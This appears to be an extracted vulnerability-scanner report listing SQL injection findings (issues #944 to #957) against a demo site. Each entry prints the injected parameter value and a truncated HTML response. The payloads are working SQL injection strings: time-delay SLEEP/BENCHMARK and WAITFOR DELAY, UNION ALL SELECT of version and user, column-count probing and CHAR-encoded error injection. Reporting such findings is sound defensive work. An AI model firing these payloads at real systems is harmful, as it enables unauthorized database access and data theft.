href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #944\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #945\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #946\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io/*!10000 1/0 */\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #947\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1-false\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #948\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #949\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #950\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #951\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ';waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #952\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #953\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #954\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 16--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #955\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io '));waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #956\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width\n=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps\n/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\">\nwindow.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start \nof Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://\nstatic.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\">\n</script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <\nlink rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJb\nWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQI\noqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #957\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- 